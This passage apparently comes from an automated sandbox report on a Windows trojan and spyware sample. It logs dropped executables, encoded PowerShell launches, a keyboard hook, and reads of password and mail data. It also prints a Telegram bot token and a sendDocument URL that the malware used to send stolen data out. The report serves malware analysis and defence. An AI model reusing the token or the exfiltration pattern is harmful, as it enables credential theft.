                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: kDPmkTm.exe, 00000013.00000002.653315830.0000000006C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.s
                Source: file.exe, 00000004.00000002.618527573.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org4
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.0000000003471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
                Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: unknownHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49697 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Users\user\Desktop\file.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: file.exe, 00000000.00000002.384459373.0000000000E50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\file.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056E4A80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056E2369
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056E2378
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056E4A72
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_056E152F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0123C978
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0123A9B8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01239DA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0123A0E8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06980870
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_069855C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0698C8AC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C46210
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C430A8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C48E18
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C42370
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C4237C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C43080
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C43000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_06C4CD99
                Source: file.exe, 00000000.00000002.385810798.0000000002D14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.388743810.0000000003D59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000003.372912348.00000000055E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTmonzgkzafmfijmsj.dll" vs file.exe
                Source: file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs file.exe
                Source: file.exe, 00000000.00000002.384459373.0000000000E50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000000.00000002.385810798.0000000002C81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000002.388743810.0000000003CC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs file.exe
                Source: file.exe, 00000000.00000000.305756685.0000000000840000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTmonzgkzafmfijmsj.dll" vs file.exe
                Source: file.exe, 00000004.00000002.609344708.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                Source: file.exe, 00000004.00000002.618527573.0000000002D29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
                Source: file.exe, 00000004.00000003.389929403.00000000066CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exe, 00000004.00000002.608064863.0000000000D68000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs file.exe
                Source: file.exeBinary or memory string: OriginalFilenameMtzdyotephm.exe" vs file.exe
                Source: file.exeReversingLabs: Detection: 35%
                Source: file.exeVirustotal: Detection: 44%
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe"
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeProcess created: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\UwztwjweucJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\CdFileMgrJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/15@8/3
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: file.exeStatic file information: File size 1825280 > 1048576
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1bd000
                Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
